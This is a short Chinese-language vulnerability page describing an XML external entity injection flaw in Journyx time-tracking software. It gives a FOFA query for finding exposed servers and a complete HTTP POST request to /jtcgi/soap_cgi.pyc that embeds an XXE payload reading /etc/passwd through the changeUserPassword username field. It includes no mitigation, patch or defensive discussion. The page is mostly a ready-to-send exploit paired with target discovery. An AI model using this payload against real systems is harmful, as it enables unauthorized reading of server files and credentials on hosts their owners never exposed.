登录 白背景

Journyx 存在XML外部实体注入漏洞

一、漏洞简介

Journyx 存在XML外部实体注入漏洞

二、影响版本

  • Journyx

三、资产测绘

  • fofa"Journyx"

1723137626113-fdb58501-44e8-4844-ab8e-43417a337364.png

四、漏洞复现

POST /jtcgi/soap_cgi.pyc HTTP/1.1
Host: 
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Ldwk: bG91ZG9uZ3dlbmt1
User-Agent: curl/8.1.2
Content-Length: 333

<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM "file:///etc/passwd">]><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header/><soapenv:Body><changeUserPassword><username>&test;</username><curpwd>zzz</curpwd><newpwd>zzz123</newpwd></changeUserPassword></soapenv:Body></soapenv:Envelope>

1723137661089-06d2c4f0-dae9-4e55-8142-aeecb3bdb8c5.png

原文: https://www.yuque.com/xiaokp7/ocvun2/wdfwrfevxtb7upbn